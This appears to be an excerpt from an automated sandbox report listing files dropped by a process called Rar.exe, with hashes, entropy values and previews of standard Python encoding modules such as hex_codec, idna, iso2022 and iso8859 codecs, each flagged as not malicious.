                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1563
                                                                                                                                                                                                                                  Entropy (8bit):4.660866418659877
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:Xtc/QX1AIgs1AIc1wX1euM8ivIvPTKs3ntJxHjH:XS/QX/gs/cmX8uAA3TKsdrH
                                                                                                                                                                                                                                  MD5:1E55C95602534092B4DB3ED99CB9E67C
                                                                                                                                                                                                                                  SHA1:D1DBA179C7F3B0FF22D4F1713275D0C48637BB48
                                                                                                                                                                                                                                  SHA-256:5881C1AEEEB5F9CD27CE0E0E62AB9D6551F094955DBD52DC8184165DAF78AEBA
                                                                                                                                                                                                                                  SHA-512:84DACC6B4CBFBB99D7D6F0124EF1E7B26035C7249730EB1C185B60A750DE2548CA60E8A939DF8445D5DDDF1F8D397708A264D9FD7771C674C7DA889C306C9D93
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:"""Python 'hex_codec' Codec - 2-digit hex content transfer encoding.....This codec de/encodes from bytes to bytes.....Written by Marc-Andre Lemburg (mal@lemburg.com)..."""....import codecs..import binascii....### Codec APIs....def hex_encode(input, errors='strict'):.. assert errors == 'strict'.. return (binascii.b2a_hex(input), len(input))....def hex_decode(input, errors='strict'):.. assert errors == 'strict'.. return (binascii.a2b_hex(input), len(input))....class Codec(codecs.Codec):.. def encode(self, input, errors='strict'):.. return hex_encode(input, errors).. def decode(self, input, errors='strict'):.. return hex_decode(input, errors)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. assert self.errors == 'strict'.. return binascii.b2a_hex(input)....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. assert self.errors == 'strict'..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13789
                                                                                                                                                                                                                                  Entropy (8bit):4.607934099089844
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:zbhsuOTDvRFUrXPLouhIAs2+ijLoM69Ne/DD6e:STjuhIAlgM6G6e
                                                                                                                                                                                                                                  MD5:1332CCB5750EB756B2856CCAD9E18CC1
                                                                                                                                                                                                                                  SHA1:ACDBF93730FB0420EA5B77AFE7E3282669829EF4
                                                                                                                                                                                                                                  SHA-256:681FF6A2273BD64450E04FC6F04B2EC63015A91490E30A31E25ED193708C99D4
                                                                                                                                                                                                                                  SHA-512:6F43760A54CB494E48B8C9A659505727246AEAF539AD4A35AFE6F4F5D0E4A84C2F5F0ED5055794DE2D575E78D5A5D1497EB795F35D8F5533DF955587EBC38FD4
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec generated from 'hp_roman8.txt' with gencodec.py..... Based on data from ftp://dkuug.dk/i18n/charmaps/HP-ROMAN8 (Keld Simonsen).... Original source: LaserJet IIP Printer User's Manual HP part no.. 33471-90901, Hewlet-Packard, June 1989..... (Used with permission)...."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.Strea
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1050
                                                                                                                                                                                                                                  Entropy (8bit):4.49858978606931
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:nvpqxOz+f/Xo1cZKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9ecJxFpz:vpqyP1ct62VJjRU8njOxLnrxLbrLK5Jd
                                                                                                                                                                                                                                  MD5:78235EEDFAE419F3CC13044D7890799B
                                                                                                                                                                                                                                  SHA1:5BF1944AC39D99B3777CCD61DB7FAE3FF0D3E936
                                                                                                                                                                                                                                  SHA-256:2601DC6EF938FF87BD2024B3C4785254F2B3DD4D8D34D8F63E254D7B8545B077
                                                                                                                                                                                                                                  SHA-512:F5B7383FC8CBBAA13E8D101DD264D0F7952CD3A681F6746B5D941381A7CD39BE808D3E15375CF3778AC80D026658D494FA410CE1904683BD873D91C55DA9CA41
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#..# hz.py: Python Unicode Codec for HZ..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_cn, codecs..import _multibytecodec as mbc....codec = _codecs_cn.getcodec('hz')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='hz',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=IncrementalDecoder,.. streamreader=StreamRe
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9405
                                                                                                                                                                                                                                  Entropy (8bit):4.456033241276571
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:g2wxhP5XBQ/J/8V2zbxofjEY7pKrlIRYUnIzSGAy4DYvRv3:gPvPjp2zbIbwDcGx
                                                                                                                                                                                                                                  MD5:C2DAEBCCD1DE0B4535D537DB6658A6AA
                                                                                                                                                                                                                                  SHA1:B799688CC2CFDA6164308A6A78DF70AD59876DB7
                                                                                                                                                                                                                                  SHA-256:F62053A41EEA93F5953D1DE69C98FFD7F3E2D0E9AC984BA27A9BE37ADF0F4022
                                                                                                                                                                                                                                  SHA-512:83C7224EB66F7B4AD23B678B74EE054C27D8197EE708D5CCCFC4FA9E1775978608E09AA188594C5602160F93215C4F7B113C0C593C39502FA3CB163744DDAA54
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# This module implements the RFCs 3490 (IDNA) and 3491 (Nameprep)....import stringprep, re, codecs..from unicodedata import ucd_3_2_0 as unicodedata....# IDNA section 3.1..dots = re.compile("[\u002E\u3002\uFF0E\uFF61]")....# IDNA section 5..ace_prefix = b"xn--"..sace_prefix = "xn--"....# This assumes query strings, so AllowUnassigned is true..def nameprep(label):.. # Map.. newlabel = [].. for c in label:.. if stringprep.in_table_b1(c):.. # Map to nothing.. continue.. newlabel.append(stringprep.map_table_b2(c)).. label = "".join(newlabel).... # Normalize.. label = unicodedata.normalize("NFKC", label).... # Prohibit.. for c in label:.. if stringprep.in_table_c12(c) or \.. stringprep.in_table_c22(c) or \.. stringprep.in_table_c3(c) or \.. stringprep.in_table_c4(c) or \.. stringprep.in_table_c5(c) or \.. stringprep.in_table_c6(c) or \.. stringprep.in_table_c7(c) or
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1092
                                                                                                                                                                                                                                  Entropy (8bit):4.599723694318225
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:n9qdOz0f/XojmKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9ecJxFplR:9qmFU62VJjRU8njOxLnrxLbrLKZJxTz
                                                                                                                                                                                                                                  MD5:0607F8E6310A0B601897FF8EC76FF2C4
                                                                                                                                                                                                                                  SHA1:3839A936E2792722D3F157F11965BF510241C0FA
                                                                                                                                                                                                                                  SHA-256:7169767DD6732A80A0B665315588EF9CFF2DF4D495A86BC0BDD22B5C9F0644B9
                                                                                                                                                                                                                                  SHA-512:C763E0D3AFA5DBB7FA96D03A52F0F5828A61E8FF24523BF62A852C989DD3BFBBFC3DA4535B5401A78E47FE16F3EA33364BA63655D91A6A12516315E231F23B15
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#..# iso2022_jp.py: Python Unicode Codec for ISO2022_JP..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_iso2022, codecs..import _multibytecodec as mbc....codec = _codecs_iso2022.getcodec('iso2022_jp')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='iso2022_jp',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=Incremen
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1100
                                                                                                                                                                                                                                  Entropy (8bit):4.625134249310359
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:nhq1Oz0f/XojglKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9CcJxFplR:hquF8J62VJjRU8njOxLnrxLbrLK5JxTz
                                                                                                                                                                                                                                  MD5:4D2B0675DE1A9AFB3553B5D5E894020C
                                                                                                                                                                                                                                  SHA1:A9B6F704D09F7A0B5182BE7C3581D321BA4DDA76
                                                                                                                                                                                                                                  SHA-256:627D3BDB5D3BC70DD00E51199B689D1C225EFE747A2DB8D5938E6AF78263F572
                                                                                                                                                                                                                                  SHA-512:AC8E08AA4A2235BF20C563EC1A466B666A39F09CCD4AE681CD34DCF51754E3B8C860D557354691D170ABCDE43029B3B45E5597AADDED398577F9A90C74FADC57
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#..# iso2022_jp_1.py: Python Unicode Codec for ISO2022_JP_1..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_iso2022, codecs..import _multibytecodec as mbc....codec = _codecs_iso2022.getcodec('iso2022_jp_1')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='iso2022_jp_1',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1100
                                                                                                                                                                                                                                  Entropy (8bit):4.611453480597579
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:nnSqgOz0f/Xoj7ZKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9VcJxFpz:nSq5F3t62VJjRU8njOxLnrxLbrLK0Jx/
                                                                                                                                                                                                                                  MD5:A4798D8B5DEE38BCCF3CBEAD235F392E
                                                                                                                                                                                                                                  SHA1:8971456D5A2C4A3255592399EE1141E119880774
                                                                                                                                                                                                                                  SHA-256:DC680A0E34DCE73756F0E3B5CBB23DD819022BE7E10F80E55289A5EAB9ED7C2E
                                                                                                                                                                                                                                  SHA-512:E329124E3ADA51C303556CA0C6B5B4644ED76E6F43C943BFE72F318928EF1DAA6121FE545480F4092F92B05CD25315D3E5B7ADB09E63985E9D8879BA3A751C2B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#..# iso2022_jp_2.py: Python Unicode Codec for ISO2022_JP_2..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_iso2022, codecs..import _multibytecodec as mbc....codec = _codecs_iso2022.getcodec('iso2022_jp_2')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='iso2022_jp_2',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1112
                                                                                                                                                                                                                                  Entropy (8bit):4.645190214359865
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:n8q1sOz0f/XojvKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9FcJxFplR:8qnF/62VJjRU8njOxLnrxLbrLKoJxTz
                                                                                                                                                                                                                                  MD5:E1738D28D315C80A04908CDB21CBE7BD
                                                                                                                                                                                                                                  SHA1:D79BC1E83E0A2103909A7AB97DB3A456D21C0711
                                                                                                                                                                                                                                  SHA-256:C8CB592DF0CF38A6B7E8265C02D7784FB32052EF9AD94D0FF369889EDA540273
                                                                                                                                                                                                                                  SHA-512:BFDF5D44B36916C3B828EA1C599E644CB9D3ADBC0D2D4922F016F9DDD7EB424F8A937C19FA3EFBA0E9F4AC14ADFF3C0BA6B924130ED2D050C3A9BDDC2F4165C2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#..# iso2022_jp_2004.py: Python Unicode Codec for ISO2022_JP_2004..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_iso2022, codecs..import _multibytecodec as mbc....codec = _codecs_iso2022.getcodec('iso2022_jp_2004')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='iso2022_jp_2004',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. increme
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1100
                                                                                                                                                                                                                                  Entropy (8bit):4.625134249310359
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:nrq3Oz0f/XojUKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9IcJxFplR:rqkFa62VJjRU8njOxLnrxLbrLKnJxTz
                                                                                                                                                                                                                                  MD5:3E98055A4B7D99A49798F3012C4D9DDB
                                                                                                                                                                                                                                  SHA1:8579E49AA8080610BF40A51DC18B6DF5EEE56A2E
                                                                                                                                                                                                                                  SHA-256:2A2AE4368D962C2E7B5DB2F29EE89EFD5A7FDB881DEF523C21670E0D1A1C50CE
                                                                                                                                                                                                                                  SHA-512:DBA054816FC0022810D545D089BC62997BFE04143B579E59EF1DAD2D25DCAFC879BF00CADEA2DDF3CE850728E00911984590EA8C8C8D6EA1AF30F71AA97CEA76
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#..# iso2022_jp_3.py: Python Unicode Codec for ISO2022_JP_3..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_iso2022, codecs..import _multibytecodec as mbc....codec = _codecs_iso2022.getcodec('iso2022_jp_3')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='iso2022_jp_3',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1108
                                                                                                                                                                                                                                  Entropy (8bit):4.633181613509048
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:npqNOz0f/XojaKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9ycJxFplR:pq2Fg62VJjRU8njOxLnrxLbrLK5JxTz
                                                                                                                                                                                                                                  MD5:34E904E0F16F84EC0A001DFFCDE7514C
                                                                                                                                                                                                                                  SHA1:19BCD8776FB3239A003F4B5F04B7056B81D0A6C6
                                                                                                                                                                                                                                  SHA-256:5B4439C7DBE65638166A70C5404CABB72552019D1F497193C6689B86BD3C4C94
                                                                                                                                                                                                                                  SHA-512:F9DC1EA03840BD9763BC2B1521D2557FD0111682D1FF805FCCDA123508C3F23768F819FA26B2E097447595F70ABCB2737C9B153B848D2687DB3E2E9E645801EC
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#..# iso2022_jp_ext.py: Python Unicode Codec for ISO2022_JP_EXT..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_iso2022, codecs..import _multibytecodec as mbc....codec = _codecs_iso2022.getcodec('iso2022_jp_ext')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='iso2022_jp_ext',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incremental
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1092
                                                                                                                                                                                                                                  Entropy (8bit):4.584383388529371
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:nJIBqqOz0f/XojfKyYydVM2VJjq2UIBlnjqvIiLxySrIiUmx5ASrIIKj9ncJxFpz:EqHFn62VJjRU8njOxLnrxLbrLKGJxTz
                                                                                                                                                                                                                                  MD5:F907851FF35FB61EB485B2C163A2BCCB
                                                                                                                                                                                                                                  SHA1:CA280AC9C832208B01242601F7F3A78803A1CDF9
                                                                                                                                                                                                                                  SHA-256:FD9EFD7094361F6557D00857E332D7229E922597336A0714FB0FA2402C954029
                                                                                                                                                                                                                                  SHA-512:4992572D79613856F84F7332C1D7C588B2BA4256613FCAB21BEF6C74BF8D50F2D96CAA2ABFF2C92D040DDFE45A328B7495BCB29CD51580577D5F5A5527CC469D
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:#..# iso2022_kr.py: Python Unicode Codec for ISO2022_KR..#..# Written by Hye-Shik Chang <perky@FreeBSD.org>..#....import _codecs_iso2022, codecs..import _multibytecodec as mbc....codec = _codecs_iso2022.getcodec('iso2022_kr')....class Codec(codecs.Codec):.. encode = codec.encode.. decode = codec.decode....class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,.. codecs.IncrementalEncoder):.. codec = codec....class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,.. codecs.IncrementalDecoder):.. codec = codec....class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):.. codec = codec....class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):.. codec = codec....def getregentry():.. return codecs.CodecInfo(.. name='iso2022_kr',.. encode=Codec().encode,.. decode=Codec().decode,.. incrementalencoder=IncrementalEncoder,.. incrementaldecoder=Incremen
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13483
                                                                                                                                                                                                                                  Entropy (8bit):4.571059193460173
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:qHhsuOTDvRAUrXPLouhIAs2+ijLMZt6CJTd12:HTauhIAlEZt680
                                                                                                                                                                                                                                  MD5:0466703A1EB5752CDD5115B2D738D822
                                                                                                                                                                                                                                  SHA1:03354F0D1406A99B9934276675759C6002D4A901
                                                                                                                                                                                                                                  SHA-256:CCFDBA207B483DCD38673D85B6E2A773A5BF64E8AE9DB7E90A01F8014E62B24A
                                                                                                                                                                                                                                  SHA-512:3D7B957FF194B69AC9DE7FE59BD03DB29EBD076456FC93FD3E6AFB6B09EACB8C5D327A6E17719C02AE5F71E8428BB55FAB633955861699BC4FF90C3F80D0A783
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec iso8859_1 generated from 'MAPPINGS/ISO8859/8859-1.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-1',.. encode
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13896
                                                                                                                                                                                                                                  Entropy (8bit):4.591898710758108
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:OHhsuOTDvR4UrXPLouhIAs2+ijLWDf6z6iC:bTmuhIAleu+
                                                                                                                                                                                                                                  MD5:28ADCF051DD15E45A38CE929864BBD83
                                                                                                                                                                                                                                  SHA1:A09E4C13D00393CE6C2F3CF9665455D74BBF8A0A
                                                                                                                                                                                                                                  SHA-256:76216C65399DE88B6D40E0BE3209ED7B14D6DD87AFB9C0A984ADDDD0CF6B559F
                                                                                                                                                                                                                                  SHA-512:13A368308279E76F2D6C3AEF73B66AD4EF4A5A88098FF1A85B403C3C006B3925E25BBB72A6BAC1585CF90D60CF26ADE576CCE484A65E1AE0EC52467370D0507C
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec iso8859_10 generated from 'MAPPINGS/ISO8859/8859-10.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-10',.. enc
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12642
                                                                                                                                                                                                                                  Entropy (8bit):4.621611083140247
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:gHhsuOTDvRrUrXPLouhIAs2+ijLA00pC8i5I:dTpuhIAlBH8iG
                                                                                                                                                                                                                                  MD5:8BE69EAC235E74EFCA68174DB8EA6352
                                                                                                                                                                                                                                  SHA1:28447A4EC5A2111A8B370DECD143F45935EBC454
                                                                                                                                                                                                                                  SHA-256:5E346F5769E0C3EEB6B5547B954481A821481A970AA8FEC33BFFBF07B880689A
                                                                                                                                                                                                                                  SHA-512:2E4CB687855A577BDBA8665767BFDD29E95D0952C10C0DA9C2547659629C6DBCD7A95E9C821A1CED7CA4BE5600A95BAEA1D5383AFC9A491E3861A344F1FFAEFB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""" Python Character Mapping Codec iso8859_11 generated from 'MAPPINGS/ISO8859/8859-11.TXT' with gencodec.py....."""#"....import codecs....### Codec APIs....class Codec(codecs.Codec):.... def encode(self,input,errors='strict'):.. return codecs.charmap_encode(input,errors,encoding_table).... def decode(self,input,errors='strict'):.. return codecs.charmap_decode(input,errors,decoding_table)....class IncrementalEncoder(codecs.IncrementalEncoder):.. def encode(self, input, final=False):.. return codecs.charmap_encode(input,self.errors,encoding_table)[0]....class IncrementalDecoder(codecs.IncrementalDecoder):.. def decode(self, input, final=False):.. return codecs.charmap_decode(input,self.errors,decoding_table)[0]....class StreamWriter(Codec,codecs.StreamWriter):.. pass....class StreamReader(Codec,codecs.StreamReader):.. pass....### encodings module API....def getregentry():.. return codecs.CodecInfo(.. name='iso8859-11',.. enc
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13578
                                                                                                                                                                                                                                  Entropy (8bit):4.614312894970411
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:oHhsuOTDvRNUrXPLouhIAs2+ijLdyGeyd:1TXuhIAlQGeG
                                                                                                                                                                                                                                  MD5:89E3297E11801E02B40A23B6180DCD25
                                                                                                                                                                                                                                  SHA1:EB58BC97EEE69D9DB6670CD439C684057B7A3937
                                                                                                                                                                                                                                  SHA-256:BEE45734B991C04E76C2ABA2BA8C7208F6BA743324D815DE95965945643D8084
                                                                                                                                                                                                                                  SHA-512:F8AF2186EC0C3CE5B391999280086ADFD3882425269ECFBCA4D70A33907CE42A1F8F6949D9BE2937FB92300A8235667611DECD358C7E0F8273858B72ADF56CB3
                                                                                                                                                                                                                                  Malicious:false
